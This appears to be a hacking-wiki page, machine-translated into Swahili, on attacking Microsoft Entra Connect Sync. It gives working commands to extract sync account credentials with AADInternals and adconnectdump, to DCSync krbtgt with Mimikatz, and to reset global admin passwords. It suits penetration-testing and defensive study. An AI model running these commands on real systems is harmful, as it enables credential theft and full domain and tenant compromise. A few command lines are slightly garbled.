Az - Connect Sync

Reading time: 11 minutes

Taarifa za Msingi

From the docs: Microsoft Entra Connect synchronization services (Microsoft Entra Connect Sync) ni sehemu kuu ya Microsoft Entra Connect. Inahakikisha shughuli zote zinazohusiana na kusawazisha data za utambulisho kati ya mazingira yako ya on‑premises na Microsoft Entra ID.

Huduma ya sync ina sehemu mbili, sehemu ya on‑premises Microsoft Entra Connect Sync na upande wa huduma katika Microsoft Entra ID unaoitwa Microsoft Entra Connect Sync service.

Ili kuitumia, inahitajika kusakinisha wakala wa Microsoft Entra Connect Sync kwenye server ndani ya mazingira yako ya AD. Wakala huyu ndiye atakayehakikisha ulandanishaji kutoka upande wa AD.

Connect Sync kwa msingi ni njia ya "zamani" ya Azure ya kusawazisha watumiaji kutoka AD hadi Entra ID. Njia mpya inayopendekezwa ni kutumia Entra Cloud Sync:

Az - Cloud Sync

Principals Zilizoundwa

• Akaunti MSOL_<installationID> huundwa moja kwa moja katika AD ya on‑prem. Akaunti hii inapewa jukumu la Directory Synchronization Accounts (angalia documentation) ambayo inamaanisha kuwa ina ruhusa za replication (DCSync) katika AD ya on‑prem.
• Hii inamaanisha kuwa mtu yeyote atakayefanikiwa kupata udhibiti wa akaunti hii ataweza kudhoofisha domain ya on‑premise.
• Akaunti ya huduma iliyosimamiwa ADSyncMSA<id> huundwa katika AD ya on‑prem bila ruhusa maalum za chaguo‑asili.
• Katika Entra ID Service Principal ConnectSyncProvisioning_ConnectSync_<id> huundwa na cheti.

Kusawazisha Nywila

Ulinganisha Hash za Nywila

Sehemu hii pia inaweza kutumika kusawazisha nywila kutoka AD kwenda Entra ID ili watumiaji waweze kutumia nywila zao za AD kuungana na Entra ID. Kwa hili, inahitajika kuruhusu password hash synchronization katika wakala wa Microsoft Entra Connect Sync uliosakinishwa kwenye server ya AD.

From the docs: Password hash synchronization ni mojawapo ya njia za kuingia zinazotumika kutimiza hybrid identity. Azure AD Connect inasawazisha hash, ya hash, ya nywila ya mtumiaji kutoka kwa instance ya on‑premises Active Directory hadi instance ya Azure AD iliyoko wingu.

Kwa msingi, watumiaji wote na hash ya hash za nywila husawazishwa kutoka on‑prem hadi Azure AD. Hata hivyo, nywila za maandishi wazi au hashi asilia hazitumwi hadi Azure AD.

Ulandanishaji wa hashes hufanyika kila dakika 2. Hata hivyo, kwa chaguo‑asili, muda wa kumalizika kwa nywila na muda wa kumalizika kwa akaunti hayasawazishwi katika Azure AD. Kwa hivyo, mtumiaji ambaye nywila yake ya on‑prem imeisha muda (haibadilishwi) anaweza kuendelea kupata rasilimali za Azure akitumia nywila ya zamani.

Wakati mtumiaji wa on‑prem anataka kufikia rasilimali za Azure, uthibitisho hufanyika kwenye Azure AD.

Password Writeback

Mipangilio hii inaruhusu kusawazisha nywila kutoka Entra ID kwenda AD wakati mtumiaji anapobadilisha nywila yake katika Entra ID. Kumbuka kwamba ili password writeback ifanye kazi, mtumiaji MSOL_<id> uliotengenezwa moja kwa moja katika AD anatakiwa kupewa ruhusa zaidi kama ilivyoelezwa kwenye docs ili aweze kubadilisha nywila za mtumiaji yeyote katika AD.

Hii ni ya kuvutia hasa kudhoofisha AD kutoka kwa Entra ID iliyodhuliwa kwani utaweza kubadilisha nywila ya "karibu" mtumiaji yeyote.

Domain admins na watumiaji wengine walioko katika baadhi ya makundi yenye nguvu hawarejeshwi ikiwa kikundi kina sifa ya adminCount kuwa 1. Lakini watumiaji wengine ambao wamepewa ruhusa za juu ndani ya AD bila kuwa wanachama wa makundi hayo wanaweza kubadilishwa nywila zao. Kwa mfano:

• Watumiaji waliopatiwa ruhusa za juu moja kwa moja.
• Watumiaji wa kikundi DNSAdmins.
• Watumiaji wa kikundi Group Policy Creator Owners ambao wameunda GPOs na kuziweka kwa OUs wataweza kuhariri GPOs walizozitengeneza.
• Watumiaji wa kikundi Cert Publishers Group ambao wanaweza kuchapisha vyeti ndani ya Active Directory.
• Watumiaji wa kikundi kingine chochote chenye ruhusa za juu bila sifa ya adminCount kuwa 1.

Pivoting AD --> Entra ID

Enumerating Connect Sync

Check for users:

# Check for the users created by the Connect Sync
Install-WindowsFeature RSAT-AD-PowerShell
Import-Module ActiveDirectory
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
Get-ADServiceAccount -Filter "SamAccountName -like 'ADSyncMSA*'" -Properties SamAccountName,Description | Select-Object SamAccountName,Description | fl
Get-ADUser -Filter "samAccountName -like 'Sync_*'" -Properties * | select SamAccountName,Description | fl

# Check it using raw LDAP queries without needing an external module
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(samAccountName=MSOL_*)"
$searcher.FindAll()
$searcher.Filter = "(samAccountName=ADSyncMSA*)"
$searcher.FindAll()
$searcher.Filter = "(samAccountName=Sync_*)"
$searcher.FindAll()

Angalia usanidi wa Connect Sync (ikiwa ipo):

az rest --url "https://graph.microsoft.com/v1.0/directory/onPremisesSynchronization"
# Check if password sychronization is enabled, if password and group writeback are enabled...

Kupata nywila

Nywila za MSOL_* user (na user Sync_* ikiwa imeundwa) zimetunzwa kwenye SQL server kwenye server ambapo Entra ID Connect imewekwa. Wasimamizi wanaweza kutoa nywila za watumiaji hao wenye mamlaka kwa maandishi wazi.
Hifadhidata iko katika C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf.

Inawezekana kutoa usanidi kutoka kwa mojawapo ya jedwali; moja yake imeencrypted:

SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent;

Usanidi uliosimbwa (the encrypted configuration) unasimbwa kwa DPAPI na una nywila za MSOL_* user katika on-prem AD na nenosiri la Sync_* katika AzureAD. Kwa hiyo, ukipata hizi mali (compromise) inawezekana kufanya privesc kwenye AD na AzureAD.

Unaweza kupata muhtasari kamili wa jinsi vitambulisho hivi vinavyohifadhiwa na kufumbuliwa katika hotuba hii.

Kutumia vibaya MSOL_*

# Once the Azure AD connect server is compromised you can extract credentials with the AADInternals module
Install-Module -Name AADInternals -RequiredVersion 0.9.0 # Uninstall-Module AADInternals  if you have a later version
Import-Module AADInternals
Get-AADIntSyncCredentials
# Or check DumpAADSyncCreds.exe from https://github.com/Hagrid29/DumpAADSyncCreds/tree/main

# Using https://github.com/dirkjanm/adconnectdump
python .\adconnectdump.py [domain.local]/administrator:<password>@192.168.10.80
.\ADSyncQuery.exe C:\Users\eitot\Tools\adconnectdump\ADSync.mdf > out.txt
python .\adconnectdump.py [domain.local]/administrator:<password>@192.168.10.80 --existing-db --from-file out.txt

# Using the creds of MSOL_* account, you can run DCSync against the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt /domain:domain.local /dc:dc.domain.local"'

Abusing ConnectSyncProvisioning_ConnectSync_

Programu hii imeundwa bila kuwa na nyadhifa zozote za usimamizi za Entra ID au Azure zilizotengwa. Hata hivyo, ina ruhusa zifuatazo za API:

• Microsoft Entra AD Synchronization Service
• ADSynchronization.ReadWrite.All
• Microsoft password reset service
• PasswordWriteback.OffboardClient.All
• PasswordWriteback.RefreshClient.All
• PasswordWriteback.RegisterClientVersion.All

Imetatizwa kwamba SP ya programu hii bado inaweza kutumiwa kufanya baadhi ya vitendo vyenye mamlaka kwa kutumia API isiyoandikwa, lakini hakuna PoC iliyopatikana hadi pale ninavyojua.
Hata hivyo, tukidhani inaweza kuwa inawezekana, itakuwa ya kuvutia kuchunguza zaidi jinsi ya kupata cheti ili kuingia kama service principal hii na kujaribu kuitumia kwa matumizi mabaya.

This blog post released soon after the change from using the Sync_* user to this service principal, explained that the certificate was stored inside the server and it was possible to find it, generate PoP (Proof of Possession) of it and graph token, and with this, be able to add a new certificate to the service principal (because a service principal can always assign itself new certificates) and then use it to maintain persistence as the SP.

Ili kufanya vitendo hivi, zana zifuatazo zimetangazwa: SharpECUtils.

Kwa mujibu wa swali hili, ili kupata cheti, lazima uendeshe zana kutoka kwenye mchakato ambao umeiba token ya mchakato miiserver.

Abusing Sync_* [DEPRECATED]

Kuathiri akaunti ya Sync_* inawezekana kuweka upya nywila ya mtumiaji yeyote (ikiwa ni pamoja na Global Administrators)

Install-Module -Name AADInternals -RequiredVersion 0.9.0 # Uninstall-Module AADInternals  if you have a later version
Import-Module AADInternals

# This command, run previously, will give us alse the creds of this account
Get-AADIntSyncCredentials

# Get access token for Sync_* account
$passwd = ConvertTo-SecureString '<password>' -AsPlainText - Force
$creds = New-Object System.Management.Automation.PSCredential ("Sync_SKIURT-JAUYEH_123123123123@domain.onmicrosoft.com", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds - SaveToCache

# Get global admins
Get-AADIntGlobalAdmins

# Get the ImmutableId of an on-prem user in Azure AD (this is the Unique Identifier derived from on-prem GUID)
Get-AADIntUser -UserPrincipalName onpremadmin@domain.onmicrosoft.com | select ImmutableId

# Reset the users password
Set-AADIntUserPassword -SourceAnchor "3Uyg19ej4AHDe0+3Lkc37Y9=" -Password "JustAPass12343.%" -Verbose

# Now it's possible to access Azure AD with the new password and op-prem with the old one (password changes aren't sync)

Pia inawezekana kubadilisha nywila za watumiaji wa cloud pekee (hata kama haikutarajiwa)

# To reset the password of cloud only user, we need their CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select UserPrincipalName,ObjectID

# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbosewers

Pia inawezekana ku-dump nenosiri la mtumiaji huyu.

Seamless SSO

Inawezekana kutumia Seamless SSO pamoja na PHS, ambayo inaweza kuwa dhaifu kwa matumizi mabaya mengine. Angalia katika:

Az - Seamless SSO

Pivoting Entra ID --> AD

• Ikiwa password writeback imewezeshwa, unaweza modify the password of any user in the AD ambaye ame-synchronized na Entra ID.
• Ikiwa groups writeback imewezeshwa, unaweza add users to privileged groups katika Entra ID ambazo zimesynchronized na AD.

References

• https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-phs
• https://aadinternals.com/post/on-prem_admin/
• https://troopers.de/downloads/troopers19/TROOPERS19_AD_Im_in_your_cloud.pdf
• https://www.youtube.com/watch?v=xei8lAPitX8
• https://www.silverfort.com/blog/exploiting-weaknesses-in-entra-id-account-synchronization-to-compromise-the-on-prem-environment/
• https://posts.specterops.io/update-dumping-entra-connect-sync-credentials-4a9114734f71